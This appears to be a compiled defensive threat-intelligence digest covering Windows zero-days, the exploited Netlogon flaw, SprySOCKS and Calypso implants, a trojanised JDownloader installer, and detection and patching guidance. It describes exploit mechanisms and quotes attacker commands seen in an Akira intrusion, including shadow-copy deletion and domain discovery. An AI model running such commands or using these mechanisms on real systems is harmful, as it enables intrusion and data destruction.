AMD-SB-7052 — Zen 2 µop-cache corruption / SoC isolation LPE (May 2026 Windows CU / Xen XSA-490)

Cisco Talos published a reverse-engineering primer (2026-06-25) on how Windows threats weaponise Component Object Model (COM) interfaces to hide operations inside legitimate service call stacks (Cisco Talos, 2026-06-25). Four technique classes with a shared detection gap — function calls routed through vtable indirection rather than direct API imports limit EDR visibility: ITaskService/ITaskScheduler persistence creates scheduled tasks with no visible schtasks.exe (T1053.005); IBackgroundCopyJob (BITS) moves C2/files attributed to the trusted BITS service process (T1197); IWbemLocator/WMI blends discovery into svchost.exe (T1082, T1518.001); and DCOM/IDispatch enables remote object activation for lateral movement (T1021.003). Families studied include Gh0stRAT (ITaskService persistence), Attor (BITS C2 + WMI), Qakbot (WMI) and WarmCookie (ITaskScheduler 1.0). The actionable takeaway for detection engineers: scheduled-task-creation rules keyed on schtasks.exe/PowerShell miss COM-based task creation, which emits different event logs; build coverage for task creation where the creating image is unexpected, WMI activity from non-system parents, and BITS jobs created by non-svchost processes.

ESET's full research paper detailed two previously undocumented Windows variants of the SprySOCKS backdoor attributed to FishMonger (Earth Lusca / Aquatic Panda — the Winnti-contractor tracked as I-SOON), centred on a RawWNPF.sys kernel driver that hides processes (NtQuerySystemInformation hook), network connections (nsiproxy.sys IOCTL interception), files (minifilter callbacks) and persistence registry keys, and redirects crafted TCP packets to a hidden backdoor port via the Windows Filtering Platform (ESET, 2026-06-16; daily 06-17). Background: FishMonger has been publicly tracked since the 2024 I-SOON contractor-leak exposed its government-espionage-for-hire model; ESET's earlier work documented the Linux SprySOCKS lineage, and this report extends the toolkit to a Windows kernel rootkit with a possible UEFI-bootkit component (leveraging the patched BlackLotus Secure Boot bypass, CVE-2023-24932). Confirmed victims are government organisations in Honduras, Taiwan, Thailand and Pakistan; the targeting class — government and defence — keeps EU government networks in scope. Enable the vulnerable-driver blocklist, hunt for the named driver and for process/network-hiding behaviours, and verify Secure Boot is at current patch level.

ESET disclosed two previously undocumented Windows variants of SprySOCKS — a backdoor it attributes to FishMonger (a.k.a. Earth Lusca / Aquatic Panda / TAG-22), assessed with high confidence as operated by Chinese contractor I-SOON (ESET WeLiveSecurity, 2026-06-16). Previously known only as a Linux backdoor, the Windows builds (WIN_PLUS and WIN_DRV) were deployed in 2023–2024 against foreign-affairs, technology and telecom government bodies in Taiwan, Thailand, Pakistan and Honduras. WIN_PLUS persists as a Windows Print Processor (VSPMsg) and supports 30+ commands over TCP/UDP/WebSocket. WIN_DRV is the notable one: it loads a kernel driver (fsdiskbit.sys, signed with a certificate from the public PastDSE leaked-cert corpus) which memory-loads a second driver to deliver rootkit-class stealth — hiding processes, files, network connections and registry keys, and performing TCP traffic diversion so the backdoor receives operator commands on an arbitrary port that never appears in netstat (BleepingComputer, 2026-06-16). ESET notes limited, unconfirmed telemetry of a possible UEFI bootkit component (potentially CVE-2023-24932-class Secure Boot bypass).

Why it matters to us: Post-deployment detection is hard because the driver actively hides artefacts; the leverage is pre-deployment hygiene. Hunt scheduled-task creation (EID 4698 / Sysmon EID 1) referencing binaries under %SystemRoot%\Fonts\, Image File Execution Options hijacks of vds.exe, and kernel-driver loads (Sysmon EID 6) of drivers signed with PastDSE-derived certificates. Because TCP diversion defeats host network-tab inspection, rely on EDR kernel sensors / ETW for listening-socket enumeration. Validate that vulnerable/revoked drivers are blocked via WDAC/HVCI and the Microsoft vulnerable-driver blocklist.

If you did nothing this week: every unpatched domain controller in your forest is a pre-auth remote-code-execution target as SYSTEM, and the exploitation is no longer hypothetical — CERT-EU confirmed in-the-wild abuse in its jurisdiction this week.

CVE-2026-41089 is a CVSS 9.8 stack-based buffer overflow (CWE-121) in the Windows Netlogon RPC service. It was disclosed and patched in the May/June cycle and tracked in the W23 weekly as a disclosure-and-patch story. This week CERT-EU published advisory 2026-007 (10 June) confirming active exploitation against unpatched DCs in the EU (CERT-EU 2026-007; daily 06-11). A domain controller compromise is full-domain compromise: the entire identity plane is in scope.

Patch every domain controller now — DCs are the one asset class where "patch window" is not a negotiation. Where patching lags, restrict Netlogon RPC exposure at the network layer and hunt for anomalous pre-authentication RPC traffic to DCs and for new SYSTEM-context processes on those hosts.

This researcher's serialised zero-day disclosures have run across four weekly cycles, and this week brought both resolution and a fresh open wound. June Patch Tuesday (9 June) finally closed the three bugs the W20–W22 weeklies tracked as "expected fix in June": YellowKey (CVE-2026-45585, BitLocker bypass via the Windows Recovery Environment, physical access required), GreenPlasma (CVE-2026-45586, CTFMON elevation to SYSTEM), and MiniPlasma (a re-opened regression of CVE-2020-17103 in the Cloud Filter driver cldflt.sys), per the patch-day round-ups (BleepingComputer; Tenable).

But the cadence continued the same day. On 9 June the researcher published RoguePlanet, a TOCTOU race in the Microsoft Defender scan engine yielding a SYSTEM shell — hours after the patches landed, with no CVE and no fix (BleepingComputer; daily 06-11). Two days later came GreatXML, a BitLocker bypass via crafted XML on the recovery partition — PoC public, practical severity contested, still unpatched (SecurityWeek; daily 06-12). The trajectory: deploy the June cumulative update to close the three patched bugs, retain BitLocker PIN/TPM policy regardless, and keep monitoring MSRC — the fourth disclosure is the pattern, not the exception.

Microsoft's June cumulative update (9 June) carries four criticals that clear the CVSS 9+ bar. CVE-2026-45657 (CVSS 9.8) is the priority: a use-after-free with a heap-overflow component in the Windows kernel's TCP/IP processing path, reachable by "specially crafted network traffic" with no authentication and no user interaction, yielding SYSTEM-level code execution (Microsoft MSRC, 2026-06-09). Microsoft rates exploitation "Less Likely" and reports no in-the-wild activity, but the unauthenticated network-reachable kernel surface makes this the June cycle's patch-first item for any Windows host exposed to untrusted networks. CVE-2026-26142 (CVSS 9.8) is an unauthenticated deserialization-of-untrusted-data RCE (CWE-502) in Nuance PowerScribe, the radiology reporting platform common in hospital imaging departments — clinical networks integrating PowerScribe with PACS/RIS should patch and restrict the service to clinical subnets (Microsoft MSRC, 2026-06-09). CVE-2026-47643 (CVSS 9.8) lets an unauthenticated attacker control the file name/path in an Azure Stack Edge upload endpoint (CWE-73), writing outside the intended directory through to code execution on the hybrid-cloud appliance (Microsoft MSRC, 2026-06-09). CVE-2026-48579 (CVSS 9.1), an improper-authorisation information-disclosure flaw in Exchange Online, is already fixed service-side with no customer action required — tenants wanting assurance can review the Unified Audit Log for anomalous mailbox-access operations predating 4 June (Microsoft MSRC, 2026-06-04). NCSC-NL groups these in its June Patch Tuesday advisories (NCSC-NL, 2026-06-11, NCSC-NL 0189).

UPDATE (originally covered 2026-W23 weekly): CERT-EU published advisory 2026-007 on 10 June 2026 confirming that CVE-2026-41089 — a CVSS 9.8 stack-based buffer overflow (CWE-121) in the Windows Netlogon service — is being actively exploited in the wild, citing Belgium's Centre for Cybersecurity (CCB) (CERT-EU, 2026-06-10). This is the material delta since the weekly's disclosure-only coverage: an EU national authority has now attributed in-the-wild exploitation, roughly 20 days after the May 2026 Patch Tuesday fix.

An unauthenticated remote attacker sends a crafted Netlogon RPC packet to obtain SYSTEM-level code execution on an unpatched domain controller — functionally a full Active Directory forest compromise, in the ZeroLogon lineage of Netlogon-channel attacks (BleepingComputer, 2026-06-01). CERT-EU's advisory carries the per-version patched-build table: Server 2016 before 10.0.14393.9140, Server 2019 before 10.0.17763.8755, Server 2022 before 10.0.20348.5074, Server 2022 23H2 before 10.0.25398.2330, and Server 2025 before 10.0.26100.32772, with Server 2012/2012 R2 also affected.

If you did nothing this week: pre-auth remote-code execution as SYSTEM on every unpatched domain controller in your forest. Belgium's CCB confirmed active exploitation on 1 June. The May Patch Tuesday fix has been available since 13 May.

CVE-2026-41089 (CVSS 9.8) is a stack-based buffer overflow in the Windows Netlogon service (MS-NRPC), first covered as an emergency action on 2 June (daily 2026-06-02). A crafted NRPC request to a domain controller triggers a memory-corruption condition before any credential exchange, allowing an unauthenticated network attacker to execute code as SYSTEM (Microsoft MSRC; BleepingComputer, 2026-06-01). All currently supported Windows Server releases including Server 2025 are affected. Belgium's Centre for Cybersecurity (CCB) confirmed active exploitation; at the time of the daily brief Microsoft had not yet updated its advisory to reflect it.

The operational priority here is the target class — domain controllers — and the fact that Netlogon is necessarily reachable from every domain-joined machine in the estate. An attacker who has compromised any domain-joined workstation can move laterally to a DC without credentials if the patch has not been applied. Detection concepts: anomalous NRPC session counts from non-DC source addresses; Windows Security EID 4625 (authentication failures) spikes on DCs correlated with unexpected source IPs; network-layer alerts on NRPC/RPC-over-named-pipe from workstation segments. Patch immediately. If patching is delayed, restrict Netlogon/LDAP exposure to trusted hosts at the network layer.

Huntress detailed an unpatched NTLMv2-leak in the Windows search: protocol handler: a crafted link with a crumb=location: parameter pointing at an attacker UNC path makes Windows open an outbound SMB (TCP 445) connection and expose the user's Net-NTLMv2 challenge-response for offline cracking or relay (Huntress, 2026-06-03 · The Hacker News, 2026-06-03). The bug class is structurally identical to the Snipping Tool ms-screensketch: handler leak (CVE-2026-33829) patched in April; Huntress reported the search: variant a day later but Microsoft declined a CVE or fix, assessing it as Moderate severity — below the Important/Critical threshold of its servicing bar. Forced-authentication mapping is T1187. The single highest-value control neutralises the whole URI-handler leak class: block outbound SMB (TCP 445/139) at host firewall and perimeter for endpoints that don't need external shares, and enable EPA on NTLM-accepting services.

UPDATE (originally covered 2026-05-13): The Windows Netlogon stack-based buffer-overflow RCE patched in May 2026 Patch Tuesday is now reported as exploited in the wild. Belgium's Centre for Cybersecurity (CCB) confirmed active exploitation on 1 June, and BleepingComputer, Help Net Security and SecurityWeek reported the same (BleepingComputer, 2026-06-01 · Help Net Security, 2026-06-01).

The vulnerability is an unauthenticated, network-reachable overflow in the Netlogon service that yields SYSTEM on a domain controller, affecting all currently supported Windows Server releases including Server 2025 (Microsoft MSRC). Microsoft had not updated its advisory to mark the CVE exploited as of 1 June, so the exploitation signal currently rests on CCB plus the reporting outlets rather than the vendor. The operational shift is decisive: a flaw previously reasonable to schedule into a patch cycle is now an emergency change for every internet- or network-reachable DC. See §0 for the immediate action.

Veeam shipped KB4852 / Backup & Replication patch version 13.0.2.29 on 2026-05-27. CVE-2026-32996 (CVSS 7.3) is a local privilege escalation in the Veeam Agent for Microsoft Windows component — an attacker with limited system access can elevate to enable arbitrary command execution, security-control disablement or lateral movement; reporter Alibaba via HackerOne. CVE-2026-32997 (CVSS 8.6) is an arbitrary file write in the Veeam Software Appliance (Linux) constrained to authenticated users with the Backup Administrator role; depending on the target path (cron, authorized_keys, library hijack), this is a stepping stone to RCE or persistence. Both affect all version-13 builds before fixed version 13.0.2.29. CERT-FR / ANSSI advisory CERTFR-2026-AVI-0652 corroborates. No exploitation reported; Veeam notes patch-reverse-engineering risk after disclosure. Veeam is the dominant backup platform in EU public-sector on-premise environments — patch the appliance and Windows agent fleet in tandem with backup-administrator least-privilege review.

CVE Summary Table

SANS ISC handler Manuel Humberto Santander Pelaez published a forensic walkthrough on 2026-05-27 reconstructing an Akira ransomware intrusion using only two log sources — SSLVPN syslog and Windows EVTX exports — joined by source IP and normalised time (SANS Internet Storm Center, 2026-05-27). [SINGLE-SOURCE] — high-reliability technical primary, but no independent corroboration of the specific kill chain. Initial access (T1078.001 / T1133): non-distributed brute force from a single hosting-provider IP against a single local SSLVPN account that had been deprovisioned in Active Directory but remained provisioned as a local firewall user with no MFA. Discovery: EID 4688 captures nltest.exe /dclist:, net.exe group "Domain Admins" /domain, net.exe group "Enterprise Admins" /domain, whoami.exe /all, and a renamed AdFind.exe variant, all parented explorer.exe → cmd.exe. Credential access (T1558.003 Kerberoasting): a cluster of EID 4769 RC4-encrypted TGS requests for multiple SPNs from a single workstation within a 90-second window. Lateral movement (T1021.001): EID 4624 Logon Type 10 chain from jump host to file server, domain controllers, backup server; EID 4672 special-logon privileges on DC. Defense evasion + impact: EID 1102 security-log clear; sc.exe / net stop of endpoint-protection services (System EID 7036); vssadmin delete shadows /all /quiet.

Why it matters to us: the diary is a forensic-primer for any SOC operating without full EDR coverage — the standard scenario in smaller public-sector entities and DACH commune networks. Concrete takeaways the SANS ISC author makes directly: reconcile local SSLVPN account directories against AD source-of-truth (deprovisioned-in-AD-but-retained-in-firewall is the recurring initial-access pathway in this class); alert on > 50 failed SSLVPN auths from a single source per hour; enable EID 4688 process auditing on every Windows host, set Security log size ≥ 1 GB; alert on RC4 TGS-REP (EID 4769 EncryptionType=0x17) for multiple SPNs from one workstation in a short window; EID 1102 security-log clear is incident-grade in every case; time-sync every host including the firewall to the same NTP source so perimeter-to-endpoint joins remain reliable.

The Windows zero-day cluster carried a material technical update beyond the 2026-05-30 daily. MiniPlasma — the sixth zero-day the "Chaotic Eclipse" researcher has dropped in six weeks — is a local privilege escalation in the Windows Cloud Filter driver (cldflt.sys) that reuses CVE-2020-17103, the researcher claiming the 2020 patch was incomplete or partially reverted. ThreatLocker independently confirmed MiniPlasma achieves SYSTEM on a fully-patched Windows 11 running the May 2026 cumulative update — i.e. there is no configuration that closes it today. Three earlier drops in the series (BlueHammer, RedSun, UnDefend) have been observed in real attacks. Microsoft's DCU has called the uncoordinated releases "never justifiable" but has shipped no out-of-band fix; June 10 Patch Tuesday is the first fix opportunity (see § 9). Until then, treat any cldflt.sys-adjacent LPE as live.

Research from the Atos Trusted Research Center (referenced by NDSS Symposium 2026 paper 2026-s1491), resurfaced in in-window reporting on 2026-05-22, argues that a large class of Windows kernel-mode drivers previously treated as BYOVD-resistant — because triggering their vulnerable IOCTL paths supposedly required physical hardware — can be made fully exploitable without that hardware (The Hacker News, 2026-05-22). Three techniques remove the gate: binding a PnP driver's AddDevice callback to a software-emulated device with an attacker-chosen hardware ID (via SetupAPI / the Software Device API); filter-driver restacking on disk/storage device stacks to bind otherwise-unloadable drivers; and direct registry manipulation under HKLM\SYSTEM\CurrentControlSet\Control\Class to associate a vulnerable driver with an existing device object. The write-up frames these against real-world example drivers to show IOCTL code paths reachable without the assumed hardware (Atos TRC, 2026-04-17).

Why it matters to us: BYOVD is a staple kernel-level EDR-bypass technique for ransomware affiliates and APTs operating against EU/CH targets, and this work expands the effective LOLDrivers attack surface — vulnerable-driver blocklists that implicitly assume a hardware prerequisite need re-evaluation. Hunt HKLM\SYSTEM\CurrentControlSet\Control\Class writes to UpperFilters/LowerFilters/ClassFilters from non-SYSTEM processes (Sysmon EID 13), driver-load events (Sysmon EID 6) for drivers loaded from user-writable paths, and streaming/thunk-class kernel drivers loaded by a non-system process. Hardening: enforce the Microsoft Vulnerable Driver Blocklist (WDAC) and HVCI/Memory Integrity, and re-test blocklist coverage against these hardware-gate-bypass techniques. ATT&CK T1068, T1014, T1562.001.

Lumen's Black Lotus Labs and PwC Threat Intelligence disclosed on 2026-05-21 two purpose-built implants used by the China-aligned espionage cluster Calypso (also tracked as Red Lamassu, Bronze Medley — active since at least mid-2022 based on binary upload and victim telemetry) in a multi-year campaign against telecommunications providers (Lumen Black Lotus Labs, 2026-05-21 · PwC Threat Intelligence, 2026-05-21). Confirmed victims include a Middle East ISP, an Afghanistan ISP, and entities in Azerbaijan, the US, and Ukraine; European telecoms are within the actor's documented targeting pattern. Showboat is a modular ELF binary masquerading as a Linux kernel worker thread (kworker — T1036.005 Masquerade: Match Legitimate Name) providing remote shell (T1059.004), bidirectional file transfer, SOCKS5 proxy to internal network segments (T1090.001 Internal Proxy), and a hide command that fetches a rootkit payload from Pastebin at runtime (T1102.001 Dead Drop Resolver) — the C2 payload is exfiltrated base64-encoded inside PNG image fields to blend with web traffic (Lumen Black Lotus Labs, 2026-05-21). JFMBackdoor, the Windows counterpart, is delivered via DLL sideloading (T1574.002): a batch script drops a legitimate signed executable that loads the malicious DLL, providing remote shell, file operations, SOCKS5 proxy, and self-removal (PwC Threat Intelligence, 2026-05-21). C2 infrastructure clusters to Chengdu, Sichuan-geolocated IP ranges; X.509 certificate SAN/CN patterns link the victim set (Lumen Black Lotus Labs, 2026-05-21). Detection: hunt for kworker ELF processes whose parent is not kthreadd (PID 2) on Linux telecom servers (auditd EXECVE or Sysmon for Linux EID 1 parent-pid check); alert on unsigned DLLs loaded by vendor-signed executables (Sysmon EID 7: signed process, unsigned module); flag egress DNS queries or HTTP GET to pastebin.com from daemon-context processes.

UPDATE (originally covered 2026-05-15): Researcher "Chaotic Eclipse" / "Nightmare Eclipse" released a third unpatched Windows LPE PoC on 2026-05-17 — MiniPlasma — extending the YellowKey and GreenPlasma series covered in the 2026-05-15 daily (BleepingComputer, 2026-05-17; The Hacker News, 2026-05-18). The material new technical detail: MiniPlasma targets the cldflt.sys Cloud Filter Mini Filter Driver — specifically the HsmOsBlockPlaceholderAccess routine — and abuses the undocumented CfAbortHydration API to create arbitrary registry keys in the .DEFAULT user hive without proper ACL checks, escalating from standard user to SYSTEM. The flaw was originally reported by Google Project Zero (James Forshaw) in September 2020 and nominally patched in December 2020 as CVE-2020-17103; Chaotic Eclipse asserts the exact same code path remains exploitable on fully-patched Windows 11 with May 2026 cumulative updates applied. Will Dormann independently confirmed the PoC opens a SYSTEM cmd.exe reliably on Windows 11 Pro fully patched. The exploit reportedly fails on the latest Insider Preview Canary builds, suggesting Microsoft has a fix in the pipeline but has not yet released an out-of-band patch. ThreatLocker published two registry-path hunt pivots: \Registry\User\Software\Policies\Microsoft\CloudFiles\BlockedApps* and \Registry\User\.DEFAULT\Volatile Environment*.

Defender takeaway: the proliferation of unpatched LPEs from one researcher signals an extended period of SYSTEM-shell availability for any attacker that lands user-level execution on Windows endpoints. Sysmon EID 13 (RegistryEvent / SetValue) on the .DEFAULT hive from non-SYSTEM processes is the primary hunt pivot; Sysmon EID 6 driver-load monitoring catches related driver-abuse paths. Hardening: BitLocker PIN mitigates the companion YellowKey BitLocker bypass; disabling Cloud Files / OneDrive integration removes the MiniPlasma attack surface but is not practical in most environments. MITRE T1068 (Exploitation for Privilege Escalation).

The researcher cluster "Chaotic Eclipse" / "Nightmare Eclipse" continued releasing unpatched Windows LPE/bypass PoCs across the window. On 2026-05-19 a third PoC — MiniPlasma — landed, targeting the cldflt.sys CfAbortHydration path and claiming a re-exploitable regression of the 2020-era CVE-2020-17103. On 2026-05-20 Microsoft formally assigned CVE-2026-45585 to the BitLocker/WinRE bypass (YellowKey) disclosed on 2026-05-12 and published a WinRE mitigation — but confirmed there is still no security update for the cluster; the earliest fix window remains the June 2026 Patch Tuesday. Three public PoCs (YellowKey, GreenPlasma, MiniPlasma) now exist against the Windows-centric desktop estates standard in CH/EU federal and cantonal administrations. Until a patch ships, enforce BitLocker PIN/Network-Unlock GPOs and AppLocker/WDAC rules on ctfmon.exe injection paths, and segregate privileged accounts from the workstation tier.

If you did nothing this week: every Windows endpoint configured with TPM-only BitLocker (no PIN, no startup key — the most common laptop configuration in Swiss federal and cantonal estates) is bypassable by an attacker with brief physical access using the publicly-disclosed YellowKey PoC; every Windows endpoint with the CTFMON service (the default on Windows 10/11/Server 2022/2025) is locally elevation-of-privilege-vulnerable via the GreenPlasma primitive. Both zero-days were disclosed without coordinated vendor patching; Microsoft's May 2026 Patch Tuesday (120+ CVEs) did not address either, and no out-of-band advisory has been issued (daily 2026-05-15).

The operational reality for Swiss public-sector defenders is that the laptop full-disk-encryption story is materially weakened until Microsoft ships a fix. The interim guidance is to enforce BitLocker PIN-or-startup-key on every endpoint where physical-access risk is non-trivial (mobile estates, off-site work, hotel travel) — the GPO toggle is Computer Configuration → Administrative Templates → Windows Components → BitLocker Drive Encryption → Operating System Drives → Require additional authentication at startup. For GreenPlasma the only available control is privileged-account-segregation discipline: workstations that handle administrative credentials should not also run unprivileged user workloads where the local-EOP can be staged.

See § 1 H3 for full operational framing. Listed here for vulnerability-roll-up completeness. No CVE identifiers had been allocated by Microsoft as of 2026-05-17.

AMD disclosed AMD-SB-7052 (CVE-2025-54518, CVSS 7.3 on the CVSS 4.0 scale, CWE-1189 Improper Isolation of Shared Resources on System-on-Chip) affecting Zen 2-based processor models on 2026-05-12, with NCSC-NL flagging the advisory on 2026-05-15 (AMD Product Security, 2026-05-12 · NCSC-NL NCSC-2026-0158, 2026-05-15). The flaw allows a local attacker with code execution on the target system to corrupt the CPU operation (µop) cache and thereby cause instructions to execute at a higher privilege level than intended, enabling local privilege escalation and, in virtualisation contexts, potential degradation of hypervisor-level isolation. Mitigation is delivered as microcode integrated into the May 2026 Microsoft Windows cumulative update (the same window as the previously-covered CVE-2026-41089 / 41096 Patch Tuesday set); Fedora has issued separate kernel + microcode updates (advisory IDs per NCSC-NL CSAF references) and Xen has published XSA-490 for bare-metal hypervisor operators. Lenovo has published a product-security advisory covering affected ThinkPad / ThinkStation / Workstation models for BIOS / UEFI guidance. Attack class: T1068 Exploitation for Privilege Escalation, with elevated relevance in confidential-compute and multi-tenant virtualisation contexts (VDI estates, cloud-hosted VMs on Zen 2 hosts, shared university compute clusters). No in-the-wild exploitation confirmed. Detection / verification: confirm the May 2026 Windows CU includes the AMD microcode revision via the relevant KB and wmic cpu get name, dataWidth, processorId; for Linux hypervisors apply distro kernel + microcode updates and reboot; for Xen apply XSA-490; for Lenovo hardware check BIOS / UEFI update guidance per LEN-216977. The local-only attack vector limits external risk; the priority is multi-tenant and virtualisation contexts where guest-to-hypervisor or container-to-host isolation is part of the security boundary.

CVE Summary Table

Researcher "Nightmare Eclipse" published two new unpatched Windows zero-days on 2026-05-12–13 as full-disclosure drops after a disclosure dispute with Microsoft, bringing the total of unpatched Nightmare Eclipse Windows zero-days to four (BleepingComputer, 2026-05-13 · The Register, 2026-05-13 · NCSC-CH Security Hub #12574, 2026-05-14). YellowKey exploits a Windows Recovery Environment (WinRE) bug in NTFS transaction-log (TxF/FsTx) replay: crafted FsTx folder contents placed on a USB drive or the EFI partition are replayed by WinRE during startup, deleting winpeshl.ini — the file that suppresses the recovery shell — and dropping the attacker into a CMD prompt with the BitLocker-protected volume already mounted and readable. The current public PoC defeats TPM-only BitLocker configurations on Windows 11 and Windows Server 2022/2025; the researcher asserts the full bypass also defeats TPM+PIN but the unpublished variant is unconfirmed. MITRE ATT&CK: T1542.001 (Pre-OS Boot: System Firmware), T1006 (Direct Volume Access). GreenPlasma is a local privilege-escalation flaw in the CTFMON (Collaborative Translation Framework) service: an unprivileged user creates arbitrary section objects in SYSTEM-writable directories, which can be leveraged to manipulate privileged services for a SYSTEM token; the public PoC is partial and the exploit chain triggers a UAC prompt in default configurations. MITRE ATT&CK: T1134 (Access Token Manipulation), T1068 (Exploitation for Privilege Escalation). Neither vulnerability has been assigned a CVE nor received a Microsoft patch as of 2026-05-15; Microsoft states it is "actively investigating." A previous drop by the same researcher (BlueHammer, CVE-2026-33825, now patched) was confirmed used in real-world intrusions by Huntress in April 2026, demonstrating that this researcher's PoCs are operationally adopted. Immediate mitigations: require BitLocker pre-boot PIN (Group Policy Computer Configuration > Administrative Templates > Windows Components > BitLocker Drive Encryption > Require additional authentication at startup); set BIOS/UEFI boot password and disable USB/external-media boot; disable WinRE where operationally viable (reagentc /disable).

Microsoft's Autonomous Code Security team published a detailed technical disclosure on 2026-05-12 of MDASH, an AI-orchestrated vulnerability-discovery pipeline running over 100 specialised agents across an ensemble of frontier and distilled models (Microsoft Security Blog, 2026-05-12). The pipeline executes a five-stage prepare → scan → validate → dedup → prove loop that ends with an automated end-to-end exploitability proof before a finding is sent to engineering — meaning every MDASH-disclosed CVE was validated as practically exploitable, not just theoretically reachable. In MDASH's first production run against Windows the harness produced 16 previously unknown CVEs concentrated in the network-exposed kernel attack surface — tcpip.sys (Windows TCP/IP stack), ikeext.dll (the Windows IKEv2 keying service for DirectAccess and Always-On VPN), netlogon.dll, and dnsapi.dll — split as 10 kernel-mode and 6 user-mode bugs, including four Critical RCEs. The harness scored 88.45% on the public CyberGym benchmark (1,507 real-world CVEs across 188 open-source projects) and achieved 100% recall on the tcpip.sys historical-CVE corpus (The Register, 2026-05-13). Microsoft has scheduled a customer-facing preview of the harness for June 2026.

Defender takeaway: Two operational implications. First, the MDASH-discovered Windows CVEs (a substantial subset of the May 2026 Patch Tuesday in § 2) should be treated as "practically exploitable" even without observed ITW activity, because the proof-of-exploitability stage runs before disclosure — that lifts these above the typical "Less Likely / More Likely" scoring noise. Second, the ikeext.dll surface is directly relevant to EU public-sector remote-access deployments: DirectAccess and Always-On VPN are widely deployed as the AD-integrated remote-access primitive across Swiss federal and EU government estates; any unauthenticated bug in ikeext.dll is a remote-perimeter risk. Mapped to T1190 Exploit Public-Facing Application and T1133 External Remote Services. Hardening: expedite May 2026 cumulative update on internet-exposed Windows hosts with DirectAccess / Always-On VPN; verify the network-perimeter ACL still scopes IKEv2 reach to known client networks.

Despite the low base CVSS of 4.3 (network vector, no privileges, user interaction required), this is a priority-patch item for any organisation in scope of APT28's targeting of the predecessor vulnerability: APT28 (Fancy Bear) was attributed by CERT-UA to the predecessor CVE-2026-21510 LNK exploitation against Ukraine and EU countries in December 2025 (Akamai Security Research). Microsoft flipped the "exploited" flag on CVE-2026-32202 on 2026-04-27 (Help Net Security, 2026-04-29); neither Akamai nor Help Net Security explicitly attributes current CVE-2026-32202 in-the-wild exploitation to APT28, so the actor for CVE-2026-32202 exploitation specifically remains publicly unattributed at week-end (Microsoft MSRC — CVE-2026-32202 · daily 2026-05-08). Akamai's PatchDiff-AI analysis published 2026-04-23 reveals that Microsoft's February 2026 patch for CVE-2026-21510 successfully blocked RCE and SmartScreen bypass but left a residual zero-click NTLM coercion path intact — now tracked as CVE-2026-32202 (Akamai Security Research, 2026-04-23 · Help Net Security, 2026-04-29).

The mechanism: Windows Explorer automatically resolves UNC paths embedded in the LinkTargetIDList structure of malicious LNK files via PathFileExistsW, triggering an outbound SMB authentication handshake that leaks the user's Net-NTLMv2 hash to an attacker-controlled server — folder-open is sufficient, no user click required. Trust verification was applied only during ShellExecuteExW calls in the February 2026 patch, not in the earlier code paths where the credential theft occurs. Microsoft confirmed active exploitation on 2026-04-27 and CISA added CVE-2026-32202 to KEV the following day with a deadline of 2026-05-12. The April 14 patch shipped without the "exploited" flag, creating a 13-day window where security teams had no formal signal to treat it as urgent. Net-NTLMv2 hashes can be relayed (NTLM relay attacks) or cracked offline — both paths to lateral movement.

Patch path: April 2026 Windows cumulative updates. Supplementary controls are blocking outbound TCP 445 to non-business internet destinations at the perimeter firewall, enabling the "Restrict NTLM" Group Policy (set to "Deny all" for outbound), and migrating authentication to Kerberos-only where operationally feasible. Detection priorities for SOC hunting: SMBv2 outbound connections from explorer.exe to non-corporate IPs; NTLM authentication event 4625 / 4776 with Net-NTLMv2 from workstations; LNK file inspection at mail gateway and EDR for LinkTargetIDList entries pointing to UNC paths. ATT&CK: T1187 Forced Authentication, T1557.001 LLMNR/NBT-NS Poisoning and SMB Relay.

The official download page of JDownloader (German-developed AppWork GmbH, Java-based download manager popular across European user bases) was compromised between approximately 2026-05-06 and 2026-05-08; attackers exploited an unpatched access-control flaw in the site's CMS layer to replace Windows and Linux installer download links without altering the main JAR, the in-app updater, the macOS bundle, or the package-manager distributions (Winget, Flatpak, Snap). Trojanised Windows executables bore forged publisher names — "Zipline LLC", "The Water Team", "Peace Team" — triggering Windows SmartScreen warnings that helped some users detect the substitution. The substituted installers carry a Python-based remote-access payload; a more specific capability description has not been corroborated by a named research lab in available reporting. The JDownloader team confirmed and asked users to verify file hashes against the project's published SHA-256 manifest (PiunikaWeb, 2026-05-08 · CyberKendra, 2026-05-07 · daily 2026-05-10). Defender takeaway: audit developer / power-user / multimedia-engineering workstations across DACH for JDownloader installers downloaded between 2026-05-06 and 2026-05-08 from the official site or "Alternative Installer" link; hunt for unsigned / non-AppWork-signed JDownloader*.exe, unexpected Python interpreters in user-profile paths, and Python child processes spawned from JDownloader parent images.

The official download page of JDownloader, a German-developed (AppWork GmbH) Java-based download manager popular across European user bases, was compromised between approximately 2026-05-06 and 2026-05-08; attackers replaced the Windows and Linux installers with malicious counterparts (PiunikaWeb, 2026-05-08 · CyberKendra, 2026-05-07). The intrusion exploited an unpatched access-control flaw in the site's content-management layer, allowing unauthenticated modification of download-link targets without altering the main JAR, the in-app updater, the macOS bundle, or the package-manager distributions (Winget, Flatpak, Snap). Trojanised Windows executables bore forged publisher names — "Zipline LLC", "The Water Team", "Peace Team" — instead of the legitimate AppWork GmbH signature, triggering Windows SmartScreen warnings that helped some users detect the substitution before execution. The substituted installers are described in available reporting as carrying a Python-based remote-access payload; the precise capability description has not been corroborated by a named research lab in this run's window (see § 7). The JDownloader team confirmed the breach and have asked users to verify file hashes against the project's published SHA-256 manifest.

ATT&CK mapping: T1195.002 Supply Chain Compromise: Software Supply Chain, T1036.005 Match Legitimate Name (forged AppWork-adjacent publisher names), T1059.006 Python for the RAT runtime.

Defender takeaway: Audit endpoints — particularly developer / power-user / multimedia-engineering workstations across DACH — for JDownloader installers downloaded between 2026-05-06 and 2026-05-08 from the official site. Hunt for unsigned or non-AppWork-signed JDownloader*.exe and unexpected Python interpreters in user-profile paths; alert on Python child processes spawned from JDownloader* parent images (Sysmon EID 1 + parent-image filter). Inventory installations are uncertain via Winget / Flatpak / Snap (those distributions were not poisoned in this window) — the trojanised path was specifically the project's web-hosted installer and "Alternative Installer" download links.

A protection mechanism failure (CWE-693) in Windows Shell allows an unauthenticated, network-adjacent attacker to coerce outbound NTLM authentication from a target system after minimal user interaction with a crafted artefact (LNK file or similar Shell shortcut). When a user opens a directory containing the malicious artefact, the Shell resolves it and initiates an SMB connection to an attacker-controlled server, transmitting a NetNTLM credential hash. The attacker relays the hash for same-network lateral movement or cracks it offline to recover plaintext credentials. NVD CVSS is 4.3 (network vector, no privileges required, user interaction required), reflecting the coercion-only impact; in-the-wild exploitation and state-actor attribution make the operational risk materially higher.

